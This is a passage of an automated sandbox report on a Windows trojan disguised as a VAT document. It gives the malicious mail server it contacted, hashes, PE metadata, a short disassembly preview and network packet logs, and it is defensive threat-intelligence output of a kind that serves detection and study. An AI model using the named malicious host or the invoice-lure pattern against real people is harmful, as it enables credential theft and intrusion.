                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                142.250.186.78
                                drive.google.comUnited States
                                15169GOOGLEUSfalse
                                109.169.39.245
                                mail.reyesyasociados.comUnited Kingdom
                                20860IOMART-ASGBtrue
                                142.250.185.225
                                googlehosted.l.googleusercontent.comUnited States
                                15169GOOGLEUSfalse

                                Private

                                IP
                                192.168.11.1

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:1362
                                Start date:27.09.2021
                                Start time:13:20:41
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 13m 56s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Dokument VAT I - 85926 09 2021 MAG-8.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:41
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.spre.troj.spyw.evad.winEXE@6/1@3/4
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 98%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, HxTsr.exe, RuntimeBroker.exe, BdeUISrv.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe, UsoClient.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 40.117.96.136, 131.253.33.200, 13.107.22.200, 13.107.5.88, 20.82.210.154, 40.112.88.60, 20.199.120.85, 52.242.101.226, 52.109.8.19, 52.152.108.96, 40.125.122.151, 52.242.97.97, 52.152.110.14, 93.184.221.240, 51.104.167.186, 104.89.85.192, 20.50.102.62, 51.124.78.146, 20.73.194.208, 209.197.3.8, 20.199.120.151, 40.126.31.143, 40.126.31.6, 20.190.159.134, 20.190.159.132, 40.126.31.8, 40.126.31.135, 40.126.31.4, 20.190.159.138
                                • Excluded domains from analysis (whitelisted): geover.prod.do.dsp.mp.microsoft.com, geo.prod.do.dsp.trafficmanager.net, array607.prod.do.dsp.mp.microsoft.com, slscr.update.microsoft.com, e10370.g.akamaiedge.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, arc.msn.com, wu.azureedge.net, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, wns.notify.trafficmanager.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, geover.prod.do.dsp.mp.microsoft.com.edgekey.net, slscr.update.microsoft.com.akadns.net, www.bing.com, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, geo.prod.do.dsp.mp.microsoft.com, sls.update.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, cds.d2s7q6s2.hwcdn.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, settingsfd-geo.trafficmanager.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, sls.emea.update.microsoft.com.akadns.net, fe3.delivery.mp.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                13:24:39API Interceptor2606x Sleep call for process: RegAsm.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                109.169.39.245BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                  BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                    Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      mail.reyesyasociados.comBESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse
                                      • 109.169.39.245

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      IOMART-ASGB4czqYWTUq8Get hashmaliciousBrowse
                                      • 217.147.86.101
                                      b8uTZxALDhGet hashmaliciousBrowse
                                      • 176.56.205.97
                                      XMae11M5ygGet hashmaliciousBrowse
                                      • 109.75.167.7
                                      BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      shinto.x86Get hashmaliciousBrowse
                                      • 217.194.212.165
                                      BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      QkAgFhbO4a.exeGet hashmaliciousBrowse
                                      • 109.169.33.163
                                      ac1khvFT2V.exeGet hashmaliciousBrowse
                                      • 78.129.165.118
                                      Colis_____FR6627222019J01.vbsGet hashmaliciousBrowse
                                      • 5.77.41.150
                                      DriverPack-17-Online_749652650.1631058953__eqiqpdyx4midqk9.exeGet hashmaliciousBrowse
                                      • 87.117.239.150
                                      IcdLXZ5hGEGet hashmaliciousBrowse
                                      • 176.56.205.122
                                      xOMeOjIk7V.exeGet hashmaliciousBrowse
                                      • 78.129.249.105
                                      KW3VrbX3Av.exeGet hashmaliciousBrowse
                                      • 217.194.215.58
                                      EcyvrSp565.exeGet hashmaliciousBrowse
                                      • 217.194.215.58
                                      vigmCKdmz9Get hashmaliciousBrowse
                                      • 31.216.57.33
                                      T9V927Bbvx.exeGet hashmaliciousBrowse
                                      • 78.129.249.105
                                      fmPwEX2Lc1.exeGet hashmaliciousBrowse
                                      • 78.129.249.105
                                      2uHa4FhlY1.exeGet hashmaliciousBrowse
                                      • 78.129.249.105
                                      1isequal9.x86Get hashmaliciousBrowse
                                      • 109.169.21.223

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      37f463bf4616ecd445d4a1937da06e19qOsCIQD1uR.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      NC7bm1PoKj.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      p0FDRanFUE.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      Tt5xbxWwsb.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      rJPkGz9DpL.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      GVXEsDOGHX.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      IAWCl9VgWq.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      BRl35oWria.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      UcmKadhoIn.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      oGLE7fjvYA.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      ZbhUS5doEw.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      dEYSAsBcE8.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      PO-IMAGE-SCAN-00HD878HE485HDYTE.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      axCZVtYfcO.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      beacon.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      dL7mvARUBj.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      2B97860AFD98DFF5BED238E2A2CE25977B50BA5356333.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      pIo5Eqwc3F.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      pIo5Eqwc3F.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225
                                      CNGthNvgf6.exeGet hashmaliciousBrowse
                                      • 142.250.186.78
                                      • 142.250.185.225

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      \Device\ConDrv
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):30
                                      Entropy (8bit):3.964735178725505
                                      Encrypted:false
                                      SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                      MD5:9F754B47B351EF0FC32527B541420595
                                      SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                      SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                      SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview: NordVPN directory not found!..

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):5.702812730672399
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.15%
                                      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Dokument VAT I - 85926 09 2021 MAG-8.exe
                                      File size:90112
                                      MD5:0a2f51e6d3650f115c1b5484afbdf3a7
                                      SHA1:6283d55e065802036f0e5da958bfd458a7999c09
                                      SHA256:e49ff3e9ecbbe320e8cd29470d13b72643674b66e75ab5a824dda36eef6bf05e
                                      SHA512:4dbbba19dd4965cff3e7c9406dc37ce105beccab3cfd466eda57a734a15d3f7786b7a651f36df41a673ec53263d540de3a5aa8065a7a3e561b2d289828cf4ce7
                                      SSDEEP:1536:tDaUkPdjVa7kUSYdtAXrLHDLMAuP7I8ddUPrjr:t+TPdBaQUSB/3lm7oPrH
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L.....nR.................0... ...............@....@........

                                      File Icon

                                      Icon Hash:821ca88c8e8c8c00

                                      Static PE Info

                                      General

                                      Entrypoint:0x4012c8
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                      DLL Characteristics:
                                      Time Stamp:0x526E8EE7 [Mon Oct 28 16:20:55 2013 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:e73b8c032c82c64991ebe487a7ffcd43

                                      Entrypoint Preview

                                      Instruction
                                      push 0040FB88h
                                      call 00007F98E84B9B93h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      cmp byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      mov dword ptr [eax+317578DEh], 148B495Bh
                                      dec ecx
                                      push AC2C4F17h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add dword ptr [eax], eax
                                      add byte ptr [eax], al
                                      and byte ptr [eax], ah
                                      and byte ptr [eax], ah
                                      and byte ptr [eax], ah
                                      push esp
                                      pop ecx
                                      push esi
                                      inc ebp
                                      push ebx
                                      add byte ptr [eax], ah
                                      and byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add bh, bh
                                      int3
                                      xor dword ptr [eax], eax
                                      cmp ch, cl
                                      push edx
                                      push esp
                                      xchg eax, ecx
                                      imul edx, dword ptr [esi+59A54D37h], 08511FC4h
                                      xchg byte ptr [eax-51h], dh
                                      mov dx, ss
                                      inc ebx
                                      scasd
                                      or dword ptr [esi-1F926ABFh], eax
                                      pop eax
                                      clc
                                      lodsd
                                      sub edx, dword ptr [eax+33AD4F3Ah]
                                      cdq
                                      iretw
                                      adc dword ptr [edi+00AA000Ch], esi
                                      pushad
                                      rcl dword ptr [ebx+00000000h], cl
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      pop ds
                                      out 00h, al
                                      add byte ptr [eax+00000001h], dl
                                      or dword ptr [eax], eax
                                      push ebx
                                      jne 00007F98E84B9C04h
                                      jnc 00007F98E84B9C16h
                                      jc 00007F98E84B9C03h
                                      je 00007F98E84B9C07h
                                      add byte ptr [4D000701h], cl
                                      imul esp, dword ptr fs:[ecx+ebp*2+69h], 00011900h
                                      inc edx
                                      add byte ptr [edx], ah

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x132840x28.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x560.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000xe8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x126ec0x13000False0.513324938322data6.19701564833IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .data0x140000xcf40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .rsrc0x150000x5600x1000False0.13232421875data1.43718241534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x154380x128GLS_BINARY_LSB_FIRST
                                      RT_GROUP_ICON0x154240x14data
                                      RT_VERSION0x150f00x334dataChineseTaiwan

                                      Imports

                                      DLLImport
                                      MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaStrToAnsi, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                      Version Infos

                                      DescriptionData
                                      Translation0x0404 0x04b0
                                      LegalCopyrightChatSwipe
                                      InternalNameAfblomstrings8
                                      FileVersion4.04.0001
                                      CompanyNameChatSwipe
                                      LegalTrademarksChatSwipe
                                      CommentsChatSwipe
                                      ProductNameChatSwipe
                                      ProductVersion4.04.0001
                                      FileDescriptionChatSwipe
                                      OriginalFilenameAfblomstrings8.exe

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      ChineseTaiwan

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 27, 2021 13:24:28.567699909 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:28.567739010 CEST44349720142.250.186.78192.168.11.20
                                      Sep 27, 2021 13:24:28.568016052 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:28.587512016 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:28.587541103 CEST44349720142.250.186.78192.168.11.20
                                      Sep 27, 2021 13:24:28.619915962 CEST44349720142.250.186.78192.168.11.20
                                      Sep 27, 2021 13:24:28.620304108 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:28.620309114 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:28.620599985 CEST44349720142.250.186.78192.168.11.20
                                      Sep 27, 2021 13:24:28.620852947 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:28.773884058 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:28.774070978 CEST44349720142.250.186.78192.168.11.20
                                      Sep 27, 2021 13:24:28.774766922 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:28.782808065 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:28.825927973 CEST44349720142.250.186.78192.168.11.20
                                      Sep 27, 2021 13:24:29.172624111 CEST44349720142.250.186.78192.168.11.20
                                      Sep 27, 2021 13:24:29.172703028 CEST44349720142.250.186.78192.168.11.20
                                      Sep 27, 2021 13:24:29.172777891 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:29.172802925 CEST44349720142.250.186.78192.168.11.20
                                      Sep 27, 2021 13:24:29.172840118 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:29.172966003 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:29.213215113 CEST49720443192.168.11.20142.250.186.78
                                      Sep 27, 2021 13:24:29.213262081 CEST44349720142.250.186.78192.168.11.20
                                      Sep 27, 2021 13:24:29.305279016 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.305309057 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.305448055 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.305774927 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.305790901 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.338001013 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.338188887 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.338663101 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.338902950 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.342358112 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.342533112 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.342715025 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.343194962 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.385935068 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.698508978 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.698781013 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.699028015 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.699189901 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.699224949 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.699640036 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.699867964 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.700937033 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.701157093 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.701179028 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.701236010 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.701378107 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.701412916 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.703687906 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.703927040 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.706856966 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.707067013 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.708172083 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.708336115 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.708355904 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.708399057 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.708543062 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.708576918 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.708770037 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.709070921 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.709235907 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.709284067 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.709541082 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.709639072 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.709820032 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.709857941 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.710047960 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.710395098 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.710593939 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.710640907 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.710832119 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.711035013 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.711184978 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.711230993 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.711441994 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.711720943 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.711946011 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.711992979 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.712210894 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.712376118 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.712610006 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.712656021 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.712888002 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.713051081 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.713217020 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.713249922 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.713306904 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.713438034 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.713474035 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.714073896 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.714237928 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.714283943 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.714334965 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.714464903 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.714499950 CEST49721443192.168.11.20142.250.185.225
                                      Sep 27, 2021 13:24:29.714988947 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.715156078 CEST44349721142.250.185.225192.168.11.20
                                      Sep 27, 2021 13:24:29.715238094 CEST49721443192.168.11.20142.250.185.225

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 27, 2021 13:23:40.852931976 CEST5354353192.168.11.201.1.1.1
                                      Sep 27, 2021 13:23:40.862291098 CEST53535431.1.1.1192.168.11.20
                                      Sep 27, 2021 13:23:41.107079983 CEST4960653192.168.11.201.1.1.1
                                      Sep 27, 2021 13:23:41.115597963 CEST53496061.1.1.1192.168.11.20
                                      Sep 27, 2021 13:23:41.980961084 CEST5223953192.168.11.201.1.1.1
                                      Sep 27, 2021 13:23:41.990345001 CEST53522391.1.1.1192.168.11.20
                                      Sep 27, 2021 13:23:43.092964888 CEST6344753192.168.11.201.1.1.1
                                      Sep 27, 2021 13:23:43.101252079 CEST53634471.1.1.1192.168.11.20
                                      Sep 27, 2021 13:23:43.865339994 CEST5965453192.168.11.201.1.1.1
                                      Sep 27, 2021 13:23:43.874893904 CEST53596541.1.1.1192.168.11.20
                                      Sep 27, 2021 13:23:48.745920897 CEST5599553192.168.11.201.1.1.1
                                      Sep 27, 2021 13:23:48.754584074 CEST53559951.1.1.1192.168.11.20
                                      Sep 27, 2021 13:23:51.077373028 CEST6072653192.168.11.201.1.1.1
                                      Sep 27, 2021 13:23:51.085839987 CEST53607261.1.1.1192.168.11.20
                                      Sep 27, 2021 13:23:51.938255072 CEST5390053192.168.11.201.1.1.1
                                      Sep 27, 2021 13:23:51.946919918 CEST53539001.1.1.1192.168.11.20
                                      Sep 27, 2021 13:23:52.611300945 CEST5243953192.168.11.201.1.1.1
                                      Sep 27, 2021 13:23:52.619929075 CEST53524391.1.1.1192.168.11.20
                                      Sep 27, 2021 13:23:52.637425900 CEST6039253192.168.11.201.1.1.1
                                      Sep 27, 2021 13:23:52.646013975 CEST53603921.1.1.1192.168.11.20
                                      Sep 27, 2021 13:23:53.130543947 CEST5204753192.168.11.201.1.1.1
                                      Sep 27, 2021 13:23:53.139076948 CEST53520471.1.1.1192.168.11.20
                                      Sep 27, 2021 13:24:28.545675039 CEST6364853192.168.11.201.1.1.1
